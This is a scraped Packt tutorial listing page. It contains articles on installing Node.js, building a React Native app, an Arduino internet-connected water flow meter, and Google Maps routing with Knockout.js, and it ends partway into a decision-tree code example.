self.assertRaises(RuntimeError): calc = Calculator() calc.enter_value(5) calc.enter_operation('add') calc.evaluate() That completes the test case for the Calculator class. Note that we have only used a small subset of the available test assertions over our two test classes. A full list of all the test assertions is available in the unittest module documentation at https://docs.python.org/2/library/unittest.html#test-cases. Once all the tests are written, they can be executed using the following command in the directory containing both the calculator and tests directories: python -m unittest discover -v Here, we have the unit test framework discover all the tests automatically (which is why following the expected naming convention of prefixing names with "test" is important). We also request verbose output with the -v parameter, which shows all the tests executed and their results, as shown in the following screenshot: Summary In this article, we looked at how the PDB tool can be used to find faults in Python code and applications. We also looked at using the logging module to have Python code output a log file during execution and how this can make debugging the failures easier, as well as automated unit testing for portions of the application. Resources for Article: Further resources on this subject: Basic Image Processing[article] IRemote Desktop to Your Pi from Everywhere[article] Scraping the Data [article]
Read more
  • 0
  • 0
  • 13393

article-image-learning-nodejs-mobile-application-development
Packt
23 Sep 2015
5 min read
Save for later

Learning Node.js for Mobile Application Development

Packt
23 Sep 2015
5 min read
  In Learning Node.js for Mobile Application Development by Christopher Svanefalk and Stefan Buttigieg, the overarching goal of this article is to give you the tools and know-how to install Node.js on multiple OS platforms and how to verify the installation. After reading this article you will know how to install, configure and use the fundamental software components. You will also have a good understanding of why these tools are appropriate for developing modern applications. (For more resources related to this topic, see here.) Why Node.js? Modern apps have several requirements which cannot be provided by the app itself, such as central data storage, communication routing, and user management. In order to provide such services, apps rely on an external software component known as a backend. The backend we will use for this is Node.js, a powerful but strange beast in its category. Node.js is known for being both reliable and highly performing. Node.js comes with its own package management system, NPM (Node Package Manager), through which you can easily install, remove and manage packages for your project. What this article covers? This article covers the installation of Node.js on multiple OS platforms and how to verify the installation. The installation Node.js is delivered as a set of JavaScript libraries, executing on a C/C++ runtime that is built around the Google V8 JavaScript Engine. The two come bundled together for most major operating systems, and we will look at the specifics of installing it. Google V8 JavaScript Engine is the same JavaScript engine that is used in the Chrome browser, built for speed and efficiency. Windows For Windows, there is a dedicated MSI wizard that can be used to install Node.js, which can be downloaded from the project's official website. To do so, go to the main page, navigate to Downloads, and then select Windows Installer. After it is downloaded, run MSI, follow the steps given to select the installation options, and conclude the install. Keep in mind that you will need to restart your system in order to make the changes effective. Linux Most major Linux distributions provide convenient installs of Node.js through their own package management systems. However, it is important to keep in mind that for many of them, NPM will not come bundled with the main Node.js package. Rather, it will be provided as a separate package. We will show how to install both in the following section. Ubuntu/Debian Open a terminal and issue sudo apt-get update to make sure that you have the latest package listings. After this, issue apt-get install nodejsnpm in order to install both Node.js and NPM in one swoop. Fedora/RHEL/CentOS On Fedora 18 or later, open a terminal and issue sudo yum install nodejsnpm. The system will perform the full setup for you. If you are running RHEL or CentOS, you will need to enable the optional EPEL repository. This can be done in conjunction with the install process, so that you do not need to do it again while upgrading, by issuing the sudo yum install nodejsnpm --enablerepo=epel command. Verifying your installation Now that we have finished the install, let's do a sanity check and make sure that everything works as expected. To do so, we can use the Node.js shell, which is an interactive runtime environment that is used to execute JavaScript code. To open it, first open a terminal, and then issue the following on it: node This will start the interpreter, which will appear as a shell, with the input line starting with the > sign. Once you are in it, type the following: console.log(“Hello world!); Then, press Enter. The Hello world! phrase will appear on the next line. Congratulations, your system is now set up to run Node.js! Mac OS X For Mac OS X, you can find a ready-to-install PKG file by going to www.nodejs.org, navigating to Downloads, and selecting the Mac OS X Installer option. Otherwise, you can click on Install, and your package file will automatically be downloaded as shown in the followin screenshot: Once you have downloaded the file, run it and follow the instructions on the screen. It is recommended that you keep all the offered default settings, unless there are compelling reasons for you to change something with regard to your specific machine. Verifying your installation for Mac OS X After the install finishes, open a terminal and start the Node.js shell by issuing the following command: node This will start the interactive node shell where you can execute JavaScript code. To make sure that everything works, try issuing the following command to the interpreter: console.log(“hello world!”); After pressing Enter, the Hello world! phrase will appear on your screen. Congratulations, Node.js is all set up and good to go! Who this article is written for Intended for web developers of all levels of expertise who want to deep dive into cross-platform mobile application development without going through the pains of understanding the languages and native frameworks which form an integral part of developing for different mobile platforms. This article will provide the readers with the necessary basic idea to develop mobile applications with near-native functionality and help them understand the process to develop a successful cross-platform mobile application. Summary In this article, we learned the different techniques that can be used to install Node.js across different platforms. Read Learning Node.js for Mobile Application Development to dive into cross-platform mobile application development. The following are some other related titles: Node.js Design Patterns Web Development with MongoDB and Node.js Deploying Node.js Node Security Resources for Article: Further resources on this subject: Welcome to JavaScript in the full stack[article] Introduction and Composition[article] Deployment and Maintenance [article]
Read more
  • 0
  • 0
  • 8185

article-image-introduction-react-native
Eugene Safronov
23 Sep 2015
7 min read
Save for later

Introduction to React Native

Eugene Safronov
23 Sep 2015
7 min read
React is an open-sourced JavaScript library made by Facebook for building UI applications. The project has a strong emphasis on the component-based approach and utilizes the full power of JavaScript for constructing all elements. The React Native project was introduced during the first React conference in January 2015. It allows you to build native mobile applications using the same concepts from React. In this post I am going to explain the main building blocks of React Native through the example of an iOS demo application. I assume that you have previous experience in writing web applications with React. Setup Please go through getting started section on the React Native website if you would like to build an application on your machine. Quick start When all of the necessary tools are installed, let's initialize the new React application with the following command: react-native init LastFmTopArtists After the command fetches the code and the dependencies, you can open the new project (LastFmTopArtists/LastFmTopArtists.xcodeproj) in Xcode. Then you can build and run the app with cmd+R. You will see a similar screen on the iOS simulator: You can make changes in index.ios.js, then press cmd+R and see instant changes in the simulator. Demo app In this post I will show you how to build a list of popular artists using the Last.fm api. We will display them with help of ListView component and redirect on the artist page using WebView. First screen Let's start with adding a new screen into our application. For now it will contain dump text. Create file ArtistListScreen with the following code: var React = require('react-native'); var { ListView, StyleSheet, Text, View, } = React; class ArtistListScreen extendsReact.Component { render() { return ( <View style={styles.container}> <Text>Artist list would be here</Text> </View> ); } } var styles = StyleSheet.create({ container: { flex: 1, backgroundColor: 'white', marginTop: 64 } }) module.exports = ArtistListScreen; Here are some things to note: I declare react components with ES6 Classes syntax. ES6 Destructuring assignment syntax is used for React objects declaration. FlexBox is a default layout system in React Native. Flex values can be either integers or doubles, indicating the relative size of the box. So, when you have multiple elements they will fill the relative proportion of the view based on their flex value. ListView is declared but will be used later. From index.ios.js we call ArtistListScreen using NavigatorIOS component: var React = require('react-native'); var ArtistListScreen = require('./ArtistListScreen'); var { AppRegistry, NavigatorIOS, StyleSheet } = React; var LastFmArtists = React.createClass({ render: function() { return ( <NavigatorIOS style={styles.container} initialRoute={{ title: "last.fm Top Artists", component: ArtistListScreen }} /> ); } }); var styles = StyleSheet.create({ container: { flex: 1, backgroundColor: 'white', }, }); Switch to iOS Simulator, refresh with cmd+R and you will see: ListView After we have got the empty screen, let's render some mock data in a ListView component. This component has a number of performance improvements such as rendering of only visible elements and removing which are off screen. The new version of ArtistListScreen looks like the following: class ArtistListScreen extendsReact.Component { constructor(props) { super(props) this.state = { isLoading: false, dataSource: newListView.DataSource({ rowHasChanged: (row1, row2) => row1 !== row2 }) } } componentDidMount() { this.loadArtists(); } loadArtists() { this.setState({ dataSource: this.getDataSource([{name: 'Muse'}, {name: 'Radiohead'}]) }) } getDataSource(artists: Array<any>): ListView.DataSource { returnthis.state.dataSource.cloneWithRows(artists); } renderRow(artist) { return ( <Text>{artist.name}</Text> ); } render() { return ( <View style={styles.container}> <ListView dataSource={this.state.dataSource} renderRow={this.renderRow.bind(this)} automaticallyAdjustContentInsets={false} /> </View> ); } } Side notes: The DataSource is an interface that ListView is using to determine which rows have changed over the course of updates. ES6 constructor is an analog of getInitialState. The end result of the changes: Api token The Last.fm web api is free to use but you will need a personal api token in order to access it. At first it is necessary to join Last.fm and then get an API account. Fetching real data I assume you have successfully set up the API account. Let's call a real web service using fetch API: const API_KEY='put token here'; const API_URL = 'http://ws.audioscrobbler.com/2.0/?method=geo.gettopartists&country=ukraine&format=json&limit=40'; const REQUEST_URL = API_URL + '&api_key=' + API_KEY; loadArtists() { this.setState({ isLoading: true }); fetch(REQUEST_URL) .then((response) => response.json()) .catch((error) => { console.error(error); }) .then((responseData) => { this.setState({ isLoading: false, dataSource: this.getDataSource(responseData.topartists.artist) }) }) .done(); } After a refresh, the iOS simulator should display: ArtistCell Since we have real data, it is time to add artist's images and rank them on the display. Let's move artist cell display logic into separate component ArtistCell: 'use strict'; var React = require('react-native'); var { Image, View, Text, TouchableHighlight, StyleSheet } = React; class ArtistCell extendsReact.Component { render() { return ( <View> <View style={styles.container}> <Image source={{uri: this.props.artist.image[2]["#text"]}} style={styles.artistImage} /> <View style={styles.rightContainer}> <Text style={styles.rank}>## {this.props.artist["@attr"].rank}</Text> <Text style={styles.name}>{this.props.artist.name}</Text> </View> </View> <View style={styles.separator}/> </View> ); } } var styles = StyleSheet.create({ container: { flex: 1, flexDirection: 'row', justifyContent: 'center', alignItems: 'center', padding: 5 }, artistImage: { height: 84, width: 126, marginRight: 10 }, rightContainer: { flex: 1 }, name: { textAlign: 'center', fontSize: 14, color: '#999999' }, rank: { textAlign: 'center', marginBottom: 2, fontWeight: '500', fontSize: 16 }, separator: { height: 1, backgroundColor: '#E3E3E3', flex: 1 } }) module.exports = ArtistCell; Changes in ArtistListScreen: // declare new component var ArtistCell = require('./ArtistCell'); // use it in renderRow method: renderRow(artist) { return ( <ArtistCell artist={artist} /> ); } Press cmd+R in iOS Simulator: WebView The last piece of the application would be to open a web page by clicking in ListView. Declare new component WebView: 'use strict'; var React = require('react-native'); var { View, WebView, StyleSheet } = React; class Web extendsReact.Component { render() { return ( <View style={styles.container}> <WebView url={this.props.url}/> </View> ); } } var styles = StyleSheet.create({ container: { flex: 1, backgroundColor: '#F6F6EF', flexDirection: 'column', }, }); Web.propTypes = { url: React.PropTypes.string.isRequired }; module.exports = Web; Then by using TouchableHighlight we will call onOpenPage from ArtistCell: class ArtistCell extendsReact.Component { render() { return ( <View> <TouchableHighlight onPress={this.props.onOpenPage} underlayColor='transparent'> <View style={styles.container}> <Image source={{uri: this.props.artist.image[2]["#text"]}} style={styles.artistImage} /> <View style={styles.rightContainer}> <Text style={styles.rank}>## {this.props.artist["@attr"].rank}</Text> <Text style={styles.name}>{this.props.artist.name}</Text> </View> </View> </TouchableHighlight> <View style={styles.separator}/> </View> ); } } Finally open web page from ArtistListScreen component: // declare new component var WebView = require('WebView'); class ArtistListScreen extendsReact.Component { // will be called on touch from ArtistCell openPage(url) { this.props.navigator.push({ title: 'Web View', component: WebView, passProps: {url} }); } renderRow(artist) { return ( <ArtistCell artist={artist} // specify artist's url on render onOpenPage={this.openPage.bind(this, artist.url)} /> ); } } Now a touch on any cell in ListView will load a web page for selected artist: Conclusion You can explore source code of the app on Github repo. For me it was a real fun to play with React Native. I found debugging in Chrome and error stack messages extremely easy to work with. By using React's component-based approach you can build complex UI without much effort. I highly recommend to explore this technology for rapid prototyping and maybe for your next awesome project. Useful links Building a flashcard app with React Native Examples of React Native apps React Native Videos Video course on React Native Want more JavaScript? Visit our dedicated page here. About the author Eugene Safronov is a software engineer with a proven record of delivering high quality software. He has an extensive experience building successful teams and adjusting development processes to the project’s needs. His primary focuses are Web (.NET, node.js stacks) and cross-platform mobile development (native and hybrid). He can be found on Twitter @sejoker.
Read more
  • 0
  • 0
  • 4446
article-image-internet-connected-smart-water-meter
Packt
22 Sep 2015
13 min read
Save for later

Internet Connected Smart Water Meter

Packt
22 Sep 2015
13 min read
In this article by Pradeeka Seneviratne, author of the book Internet of Things with Arduino Blueprints, goes on to say that for many years and even now, water meter readings are collected manually. To do this, a person has to visit the location where the water meter is installed. In this article, we learn how to make a smart water meter with an LCD screen that has the ability to connect to the Internet wirelessly and serve meter readings to the utility company as well as the consumer. (For more resources related to this topic, see here.) In this article, we will: Learn about water flow meters and its basic operation Learn how to mount and plumb a water flow meter to the pipeline Read and count water flow sensor pulses Calculate water flow rate and volume Learn about LCD displays and connecting with Arduino Convert a water flow meter to a simple web server and serve meter readings over the Internet Prerequisites The following are the prerequisites: One Arduino UNO board (The latest version is REV 3) One Arduino Wi-Fi Shield (The latest version is REV 3) One Adafruit Liquid flow meter or a similar one One Hitachi HD44780 DRIVER compatible LCD Screen (16x2) One 10K ohm resistor One 10K ohm potentiometer Few Jumper wires with male and female headers (https://www.sparkfun.com/products/9140) Water Flow Meters The heart of a water flow meter consists of a Hall Effect sensor that outputs pulses for magnetic field changes. Inside the housing, there is a small pinwheel with a permanent magnet attached. When the water flows through the housing, the pinwheel begins to spin and the magnet attached to it passes very close to the Hall Effect sensor in every cycle. The Hall Effect sensor is covered with a separate plastic housing to protect it from the water. The result generates an electric pulse that transitions from low voltage to high voltage, or high voltage to low voltage, depending on the attached permanent magnet's polarity. The resulting pulse can be read and counted using Arduino. For this project, we will be using Adafruit Liquid Flow Meter. You can visit the product page at http://www.adafruit.com/products/828. The following image shows Adafruit Liquid Flow Meter: This image is taken from http://www.adafruit.com/products/828 Pinwheel attached inside the water flow meter A little bit about Plumbing Typically, the direction of the water flow is indicated by an arrow mark on top of the water flow meter's enclosure. Also, you can mount the water flow meter either horizontally or vertically according to its specifications. Some water flow meters can mount both horizontally and vertically. You can install your water flow meter to a half-inch pipeline using normal BSP pipe connectors. The outer diameter of the connector is 0.78" and the inner thread size is half an inch. The water flow meter has threaded ends on both sides. Connect the threaded side of the PVC connectors to both ends of the water flow meter. Use the thread seal tape to seal the connection, and then connect the other ends to an existing half-inch pipe line using PVC pipe glue or solvent cement. Make sure to connect the water flow meter with the pipeline in the correct direction. See the arrow mark on top of the water flow meter for flow direction. BNC Pipeline Connector made by PVC Securing the connection between Water Flow Meter and BNC Pipe Connector using Thread seal PVC Solvent cement used to secure the connection between pipeline and BNC pipe connector. Wiring the water flow meter with Arduino The water flow meter that we are using with this project has three wires, which are as follows: The red wire indicates the positive terminal The black wire indicates the Negative terminal The yellow wire indicates the DATA terminal All three wire ends are connected to a JST connector. Always refer to the datasheet before connecting them with the microcontroller and the power source. Use jumper wires with male and female headers as follows: Connect the positive terminal of the water flow meter to Arduino 5V. Connect the negative terminal of the water flow meter to Arduino GND. Connect the DATA terminal of the water flow meter to Arduino digital pin 2 through a 10K ohm resistor. You can directly power the water flow sensor using Arduino since most of the residential type water flow sensors operate under 5V and consume a very low amount of current. You can read the product manual for more information about the supply voltage and supply current range to save your Arduino from high current consumption by the water flow sensor. If your water flow sensor requires a supply current of more than 200mA or a supply voltage of more than 5V to function correctly, use a separate power source with it. The following image illustrates jumper wires with male and female headers: Reading pulses Water flow meter produces and outputs digital pulses according to the amount of water flowing through it that can be detected and counted using Arduino. According to the data sheet, the water flow meter that we are using for this project will generate approximately 450 pulses per liter. So 1 pulse approximately equals to [1000 ml/450 pulses] 2.22 ml. These values can be different depending on the speed of the water flow and the mounting polarity. Arduino can read digital pulses by generating the water flow meter through the DATA line. Rising edge and falling edge There are two type of pulses, which are as follows: Positive-going pulse: In an idle state, the logic level is normally LOW. It goes to HIGH state, stays at HIGH state for time t, and comes back to LOW state. Negative-going pulse: In an idle state, the logic level is normally HIGH. It goes LOW state, stays at LOW state for time t, and comes back to HIGH state. The rising edge and falling edge of a pulse are vertical. The transition from LOW state to HIGH state is called RISING EDGE and the transition from HIGH state to LOW state is called falling EDGE. You can capture digital pulses using rising edge or falling edge, and in this project, we will be using the rising edge. Reading and counting pulses with Arduino In the previous section, you have attached the water flow meter to Arduino. The pulse can be read by digital pin 2 and the interrupt 0 is attached to digital pin 2. The following sketch counts pulses per second and displays on the Arduino Serial Monitor. Using Arduino IDE, upload the following sketch into your Arduino board: int pin = 2; volatile int pulse; const int pulses_per_litre=450; void setup() { Serial.begin(9600); pinMode(pin, INPUT); attachInterrupt(0, count_pulse, RISING); } void loop() { pulse=0; interrupts(); delay(1000); noInterrupts(); Serial.print("Pulses per second: "); Serial.println(pulse); } void count_pulse() { pulse++; } Calculating the water flow rate The water flow rate is the amount of water flowing at a given time and can be expressed in gallons per second or liters per second. The number of pulses generated per liter of water flowing through the sensor can be found in the water flow sensor's specification sheet. Let's say m. So, you can count the number of pulses generated by the sensor per second, Let's say n. Thus, the water flow rate R can be expressed as follows: The water flow rate is measured in liters per second. Also, you can calculate the water flow rate in liters per minute as follows: For example, if your water flow sensor generates 450 pulses for one liter of water flowing through it and you get 10 pulses for the first second, then the elapsed water flow rate is 10/450 = 0.022 liters per second or 0.022 * 1000 = 22 milliliters per second. Using your Arduino IDE, upload the following sketch into your Arduino board. It will output water flow rate in liters per second on the Arduino Serial Monitor. int pin = 2; volatile int pulse; const int pulses_per_litre=450; void setup() { Serial.begin(9600); pinMode(pin, INPUT); attachInterrupt(0, count_pulse, RISING); } void loop() { pulse=0; interrupts(); delay(1000); noInterrupts(); Serial.print("Pulses per second: "); Serial.println(pulse); Serial.print("Water flow rate: "); Serial.print(pulse/pulses_per_litre); Serial.println("litres per second"); } void count_pulse() { pulse++; } Calculating water flow volume Water flow volume can be calculated by adding all the flow rates per second of a minute and can be expressed as follows: Volume = ∑ Flow Rates The following Arduino sketch will calculate and output the total water volume since startup. Upload the sketch into your Arduino board using Arduino IDE. int pin = 2; volatile int pulse; float volume = 0; float flow_rate =0; const int pulses_per_litre=450; void setup() { Serial.begin(9600); pinMode(pin, INPUT); attachInterrupt(0, count_pulse, RISING); } void loop() { pulse=0; volume=0; interrupts(); delay(1000); noInterrupts(); Serial.print("Pulses per second: "); Serial.println(pulse); flow_rate = pulse/pulses_per_litre; Serial.print("Water flow rate: "); Serial.print(flow_rate); Serial.println("litres per second"); volume = volume + flow_rate; Serial.print("Volume: "); Serial.print(volume); Serial.println(" litres"); } void count_pulse() { pulse++; } To measure the accurate water flow rate and volume, the water flow meter will need careful calibration. The sensor inside the water flow meter is not a precision sensor, and the pulse rate does vary a bit depending on the flow rate, fluid pressure, and sensor orientation. Adding an LCD screen to the water meter You can add an LCD screen to your water meter to display readings rather than displaying them on the Arduino serial monitor. You can then disconnect your water meter from the computer after uploading the sketch onto your Arduino. Using a Hitachi HD44780 driver compatible LCD screen and Arduino LiquidCrystal library, you can easily integrate it with your water meter. Typically, this type of LCD screen has 16 interface connectors. The display has 2 rows and 16 columns, so each row can display up to 16 characters. Wire your LCD screen with Arduino as shown in the preceding diagram. Use the 10K potentiometer to control the contrast of the LCD screen. Perform the following steps to connect your LCD screen with your Arduino: LCD RS pin to digital pin 8 LCD Enable pin to digital pin 7 LCD D4 pin to digital pin 6 LCD D5 pin to digital pin 5 LCD D6 pin to digital pin 4 LCD D7 pin to digital pin 3 Wire a 10K pot to +5V and GND, with its wiper (output) to LCD screens VO pin (pin3). Now, upload the following sketch into your Arduino board using Arduino IDE, and then remove the USB cable from your computer. Make sure the water is flowing through the water meter and press the Arduino reset button. You can see number of pulses per second, water flow rate per second, and the total water volume from the beginning of the time displayed on the LCD screen. #include <LiquidCrystal.h> int pin = 2; volatile int pulse; float volume = 0; float flow_rate =0; const int pulses_per_litre=450; // initialize the library with the numbers of the interface pins LiquidCrystal lcd(8, 7, 6, 5, 4, 3); void setup() { Serial.begin(9600); pinMode(pin, INPUT); attachInterrupt(0, count_pulse, RISING); // set up the LCD's number of columns and rows: lcd.begin(16, 2); // Print a message to the LCD. lcd.print("Welcome"); } void loop() { pulse=0; volume=0; interrupts(); delay(1000); noInterrupts(); lcd.setCursor(0, 0); lcd.print("Pulses/s: "); lcd.print(pulse); flow_rate = pulse/pulses_per_litre; lcd.setCursor(0, 1); lcd.print(flow_rate,DEC); lcd.print(" l/s"); volume = volume + flow_rate; lcd.setCursor(0, 8); lcd.print(volume, DEC); lcd.println(" l"); } void count_pulse() { pulse++; } Converting your water meter to a web server In the previous steps, you have learned how to display your water flow sensor's readings, and calculate water flow rate and total volume on the Arduino serial monitor. In this step, we learn about integrating a simple web server to your water flow sensor and remotely read your water flow sensor's readings. You can make a wireless web server with Arduino Wi-Fi shield or Ethernet connected web server with the Arduino Ethernet shield. Remove all the wires you have connected to your Arduino in the previous sections in this article. Stack the Arduino Wi-Fi shield on the Arduino board using wire-wrap headers. Make sure the Wi-Fi shield is properly seated on the Arduino board. Now reconnect the wires from water flow sensor to the Wi-Fi shield. Use the same pin numbers as in previous step. Connect 9V DC power supply to the Arduino board. Connect your Arduino to your PC using the USB cable and upload the following sketch. Once the upload is complete, remove your USB cable from the water flow meter. Upload the following Arduino sketch into your Arduino board using Arduino IDE: #include <SPI.h> #include <WiFi.h> char ssid[] = "yourNetwork"; char pass[] = "secretPassword"; int keyIndex = 0; int pin = 2; volatile int pulse; float volume = 0; float flow_rate =0; const int pulses_per_litre=450; int status = WL_IDLE_STATUS; WiFiServer server(80); void setup() { Serial.begin(9600); while (!Serial) { ; } if (WiFi.status() == WL_NO_SHIELD) { Serial.println("WiFi shield not present"); while(true); } // attempt to connect to Wifi network: while ( status != WL_CONNECTED) { Serial.print("Attempting to connect to SSID: "); Serial.println(ssid); status = WiFi.begin(ssid, pass); delay(10000); } server.begin(); } void loop() { WiFiClient client = server.available(); if (client) { Serial.println("new client"); boolean currentLineIsBlank = true; while (client.connected()) { if (client.available()) { char c = client.read(); Serial.write(c); if (c == 'n' &&currentLineIsBlank) { client.println("HTTP/1.1 200 OK"); client.println("Content-Type: text/html"); client.println("Connection: close"); client.println("Refresh: 5"); client.println(); client.println("<!DOCTYPE HTML>"); client.println("<html>"); if (WiFi.status() != WL_CONNECTED) { client.println("Couldn't get a wifi connection"); while(true); } else { //print meter readings on web page pulse=0; volume=0; interrupts(); delay(1000); noInterrupts(); client.print("Pulses per second: "); client.println(pulse); flow_rate = pulse/pulses_per_litre; client.print("Water flow rate: "); client.print(flow_rate); client.println("litres per second"); volume = volume + flow_rate; client.print("Volume: "); client.print(volume); client.println(" litres"); //end } client.println("</html>"); break; } if (c == 'n') { currentLineIsBlank = true; } else if (c != 'r') { currentLineIsBlank = false; } } } delay(1); client.stop(); Serial.println("client disconnected"); } } void count_pulse() { pulse++; } Open the water valve and make sure the water flows through the meter. Click on the RESET button on the WiFi shield. In your web browser, type your WiFi shield's IP address and press Enter. You can see your water flow sensor's flow rate and total volume on the web page. The page refreshes every 5 seconds to display the updated information. Summary In this article, you gained hands-on experience and knowledge about water flow sensors and counting pulses while calculating and displaying them. Finally, you made a simple web server to allow users to read the water meter through the Internet. You can apply this to any type of liquid, but make sure to select the correct flow sensor because some liquids react chemically with the material the sensor is made of. You can search on Google and find which flow sensors support your preferred liquid type. Resources for Article: Further resources on this subject: Getting Started with Arduino[article] Arduino Development [article] Prototyping Arduino Projects using Python [article]
Read more
  • 0
  • 0
  • 17336

article-image-using-google-maps-apis-knockoutjs
Packt
22 Sep 2015
7 min read
Save for later

Using Google Maps APIs with Knockout.js

Packt
22 Sep 2015
7 min read
This article by Adnan Jaswal, the author of the book, KnockoutJS by Example, will render a map of the application and allow the users to place markers on it. The users will also be able to get directions between two addresses, both as description and route on the map. (For more resources related to this topic, see here.) Placing marker on the map This feature is about placing markers on the map for the selected addresses. To implement this feature, we will: Update the address model to hold the marker Create a method to place a marker on the map Create a method to remove an existing marker Register subscribers to trigger the removal of the existing markers when an address changes Update the module to add a marker to the map Let's get started by updating the address model. Open the MapsApplication module and locate the AddressModel variable. Add an observable to this model to hold the marker like this: /* generic model for address */ var AddressModel = function() { this.marker = ko.observable(); this.location = ko.observable(); this.streetNumber = ko.observable(); this.streetName = ko.observable(); this.city = ko.observable(); this.state = ko.observable(); this.postCode = ko.observable(); this.country = ko.observable(); }; Next, we create a method that will create and place the marker on the map. This method should take location and address model as parameters. The method will also store the marker in the address model. Use the google.maps.Marker class to create and place the marker. Our implementation of this method looks similar to this: /* method to place a marker on the map */ var placeMarker = function (location, value) { // create and place marker on the map var marker = new google.maps.Marker({ position: location, map: map }); //store the newly created marker in the address model value().marker(marker); }; Now, create a method that checks for an existing marker in the address model and removes it from the map. Name this method removeMarker. It should look similar to this: /* method to remove old marker from the map */ var removeMarker = function(address) { if(address != null) { address.marker().setMap(null); } }; The next step is to register subscribers that will trigger when an address changes. We will use these subscribers to trigger the removal of the existing markers. We will use the beforeChange event of the subscribers so that we have access to the existing markers in the model. Add subscribers to the fromAddress and toAddress observables to trigger on the beforeChange event. Remove the existing markers on the trigger. To achieve this, I created a method called registerSubscribers. This method is called from the init method of the module. The method registers the two subscribers that triggers calls to removeMarker. Our implementation looks similar to this: /* method to register subscriber */ var registerSubscribers = function () { //fire before from address is changed mapsModel.fromAddress.subscribe(function(oldValue) { removeMarker(oldValue); }, null, "beforeChange"); //fire before to address is changed mapsModel.toAddress.subscribe(function(oldValue) { removeMarker(oldValue); }, null, "beforeChange"); }; We are now ready to bring the methods we created together and place a marker on the map. Create a map called updateAddress. This method should take two parameters: the place object and the value binding. The method should call populateAddress to extract and populate the address model, and placeMarker to place a new marker on the map. Our implementation looks similar to this: /* method to update the address model */ var updateAddress = function(place, value) { populateAddress(place, value); placeMarker(place.geometry.location, value); }; Call the updateAddress method from the event listener in the addressAutoComplete custom binding: google.maps.event.addListener(autocomplete, 'place_changed', function() { var place = autocomplete.getPlace(); console.log(place); updateAddress(place, value); }); Open the application in your browser. Select from and to addresses. You should now see markers appear for the two selected addresses. In our browser, the application looks similar to the following screenshot: Displaying a route between the markers The last feature of the application is to draw a route between the two address markers. To implement this feature, we will: Create and initialize the direction service Request routing information from the direction service and draw the route Update the view to add a button to get directions Let's get started by creating and initializing the direction service. We will use the google.maps.DirectionsService class to get the routing information and the google.maps.DirectionsRenderer to draw the route on the map. Create two attributes in the MapsApplication module: one for directions service and the other for directions renderer: /* the directions service */ var directionsService; /* the directions renderer */ var directionsRenderer; Next, create a method to create and initialize the preceding attributes: /* initialise the direction service and display */ var initDirectionService = function () { directionsService = new google.maps.DirectionsService(); directionsRenderer = new google.maps.DirectionsRenderer({suppressMarkers: true}); directionsRenderer.setMap(map); }; Call this method from the mapPanel custom binding handler after the map has been created and cantered. The updated mapPanel custom binding should look similar to this: /* custom binding handler for maps panel */ ko.bindingHandlers.mapPanel = { init: function(element, valueAccessor){ map = new google.maps.Map(element, { zoom: 10 }); centerMap(localLocation); initDirectionService(); } }; The next step is to create a method that will build and fire a request to the direction service to fetch the direction information. The direction information will then be used by the direction renderer to draw the route on the map. Our implementation of this method looks similar to this: /* method to get directions and display route */ var getDirections = function () { //create request for directions var routeRequest = { origin: mapsModel.fromAddress().location(), destination: mapsModel.toAddress().location(), travelMode: google.maps.TravelMode.DRIVING }; //fire request to route based on request directionsService.route(routeRequest, function(response, status) { if (status == google.maps.DirectionsStatus.OK) { directionsRenderer.setDirections(response); } else { console.log("No directions returned ..."); } }); }; We create a routing request in the first part of the method. The request object consists of origin, destination, and travelMode. The origin and destination values are set to the locations for from and to addresses. The travelMode is set to google.maps.TravelMode.DRIVING, which, as the name suggests, specifies that we require driving route. Add the getDirections method to the return statement of the module as we will bind it to a button in the view. One last step before we can work on the view is to clear the route on the map when the user selects a new address. This can be achieved by adding an instruction to clear the route information in the subscribers we registerd earlier. Update the subscribers in the registerSubscribers method to clear the routes on the map: /* method to register subscriber */ var registerSubscribers = function () { //fire before from address is changed mapsModel.fromAddress.subscribe(function(oldValue) { removeMarker(oldValue); directionsRenderer.set('directions', null); }, null, "beforeChange"); //fire before to address is changed mapsModel.toAddress.subscribe(function(oldValue) { removeMarker(oldValue); directionsRenderer.set('directions', null); }, null, "beforeChange"); }; The last step is to update the view. Open the view and add a button under the address input components. Add click binding to the button and bind it to the getDirections method of the module. Add enable binding to make the button clickable only after the user has selected the two addresses. The button should look similar to this: <button type="button" class="btn btn-default" data-bind="enable: MapsApplication.mapsModel.fromAddress && MapsApplication.mapsModel.toAddress, click: MapsApplication.getDirections"> Get Directions </button> Open the application in your browser and select the From address and To address option. The address details and markers should appear for the two selected addresses. Click on the Get Directions button. You should see the route drawn on the map between the two markers. In our browser, the application looks similar to the following screenshot: Summary In this article, we walked through placing markers on the map and displaying the route between the markers. Resources for Article: Further resources on this subject: KnockoutJS Templates[article] Components [article] Web Application Testing [article]
Read more
  • 0
  • 0
  • 5071

article-image-implementing-decision-trees
Packt
22 Sep 2015
4 min read
Save for later

Implementing Decision Trees

Packt
22 Sep 2015
4 min read
 In this article by the author, Sunila Gollapudi, of this book, Practical Machine Learning, we will outline a business problem that can be addressed by building a decision tree-based model, and see how it can be implemented in Apache Mahout, R, Julia, Apache Spark, and Python. This can happen many, many times. So, building a website or an app will take a bit longer than it used to. (For more resources related to this topic, see here.) Implementing decision trees Here, we will explore implementing decision trees using various frameworks and tools. The R example We will use the rpart and ctree packages in R to build decision tree-based models: Import the packages for data import and decision tree libraries as shown here: Start data manipulation: Create a categorical variable on Sales and append to the existing dataset as shown here: Using random functions, split data into training and testing datasets; Fit the tree model with training data and check how the model is working with testing data, measure the error: Prune the tree; Plotting the pruned tree will look like the following: The Spark example Java-based example using MLib is shown here: import java.util.HashMap; import scala.Tuple2; import org.apache.spark.api.java.JavaPairRDD; import org.apache.spark.api.java.JavaRDD; import org.apache.spark.api.java.JavaSparkContext; import org.apache.spark.api.java.function.Function; import org.apache.spark.api.java.function.PairFunction; import org.apache.spark.mllib.regression.LabeledPoint; import org.apache.spark.mllib.tree.DecisionTree; import org.apache.spark.mllib.tree.model.DecisionTreeModel; import org.apache.spark.mllib.util.MLUtils; import org.apache.spark.SparkConf; SparkConf sparkConf = new SparkConf().setAppName("JavaDecisionTree"); JavaSparkContext sc = new JavaSparkContext(sparkConf); // Load and parse the data file. String datapath = "data/mllib/sales.txt"; JavaRDD<LabeledPoint> data = MLUtils.loadLibSVMFile(sc.sc(), datapath).toJavaRDD(); // Split the data into training and test sets (30% held out for testing) JavaRDD<LabeledPoint>[] splits = data.randomSplit(new double[]{0.7, 0.3}); JavaRDD<LabeledPoint> trainingData = splits[0]; JavaRDD<LabeledPoint> testData = splits[1]; // Set parameters. // Empty categoricalFeaturesInfo indicates all features are continuous. Integer numClasses = 2; Map<Integer, Integer> categoricalFeaturesInfo = new HashMap<Integer, 